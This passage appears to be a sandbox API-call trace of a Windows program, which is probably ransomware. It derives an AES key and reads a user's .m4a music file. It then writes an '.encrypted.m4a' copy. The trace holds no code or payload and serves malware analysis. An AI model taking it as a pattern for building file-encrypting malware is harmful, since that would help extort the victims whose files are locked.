wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.067] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.068] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.068] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.068] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0038.068] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.069] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.069] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.069] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.069] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.069] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0038.069] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\svumdbh5swjrewp.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.069] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.069] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.070] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.072] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f")) returned 0x10 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\svumdbh5swjrewp.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.074] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.074] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x56c1, lpOverlapped=0x0) returned 1 [0038.075] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56c1) returned 0xac0018 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56c1) returned 0xac56e8 [0038.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56c1) returned 0xac0018 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.078] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.078] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.078] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56c1) returned 0xac0018 [0038.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.079] HeapFree (in: hHeap=0x770000, 